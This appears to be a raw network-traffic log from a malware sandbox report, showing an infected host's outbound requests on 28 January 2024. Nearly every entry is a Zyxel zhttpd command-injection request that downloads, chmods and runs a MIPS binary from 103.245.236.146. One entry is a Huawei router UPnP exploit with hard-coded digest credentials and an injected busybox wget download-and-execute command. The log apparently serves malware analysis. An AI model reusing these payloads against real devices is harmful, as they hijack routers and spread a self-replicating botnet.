                                                Jan 28, 2024 10:16:44.106086016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9413192.168.2.2344220200.211.152.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.106112957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9414192.168.2.233459443.246.209.18937215
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.061391115 CET833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Content-Length: 476
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /skyljnee.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9415192.168.2.2333174223.222.89.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112118959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9416192.168.2.235009054.94.253.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112148046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9417192.168.2.2334900210.225.69.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112166882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9418192.168.2.233515034.130.254.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112185001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9419192.168.2.2353044207.18.248.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112235069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9420192.168.2.2336720131.54.227.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112248898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9421192.168.2.234316291.119.90.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112272024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9422192.168.2.235431057.162.232.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112299919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9423192.168.2.2338394174.214.190.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112334967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9424192.168.2.235858244.36.238.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112376928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9425192.168.2.23456445.132.183.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112400055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9426192.168.2.235695473.204.178.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112410069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9427192.168.2.2343864190.99.152.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112433910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9428192.168.2.2356718104.11.51.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112484932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9429192.168.2.2360278161.181.84.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112499952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9430192.168.2.2350328107.57.171.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112529039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9431192.168.2.233708070.120.200.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112557888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9432192.168.2.23407845.222.66.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112584114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9433192.168.2.2359830178.171.51.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112607956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9434192.168.2.2360894159.142.131.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112642050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9435192.168.2.233849650.27.33.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112672091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9436192.168.2.2354826158.49.79.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112721920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9437192.168.2.2338488132.161.207.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112750053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9438192.168.2.235991847.206.103.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112771988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9439192.168.2.235655445.16.64.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112795115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9440192.168.2.233629232.76.184.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112824917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9441192.168.2.2342978191.225.228.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112838984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9442192.168.2.234081246.25.98.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112875938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9443192.168.2.235731039.176.113.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112894058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9444192.168.2.23437621.118.89.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112915993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9445192.168.2.235753692.175.82.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112957954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9446192.168.2.2345490111.252.46.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.112977982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9447192.168.2.23484742.166.200.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113025904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9448192.168.2.235691218.243.14.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113053083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9449192.168.2.2351342221.165.189.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113070011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9450192.168.2.233895259.68.205.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113101959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9451192.168.2.2352764141.96.76.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113121033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9452192.168.2.233291648.15.87.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113147020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9453192.168.2.234286031.7.180.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113200903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9454192.168.2.235412667.234.135.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113221884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9455192.168.2.2345430109.140.220.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113249063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9456192.168.2.2343836136.239.221.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113271952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9457192.168.2.2349098132.71.118.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113303900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9458192.168.2.2358122104.44.201.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113323927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9459192.168.2.234832864.143.110.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113347054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9460192.168.2.235997232.97.23.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113358021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9461192.168.2.236069494.44.226.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113399982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9462192.168.2.2347564220.159.104.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113403082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9463192.168.2.234266245.81.4.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113432884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9464192.168.2.23596001.163.214.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113464117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9465192.168.2.2356666194.45.139.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113502979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9466192.168.2.2344506138.196.217.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113512993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9467192.168.2.2336828202.88.223.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.113549948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9468192.168.2.2346082175.201.32.221443
                                                TimestampBytes transferredDirectionData
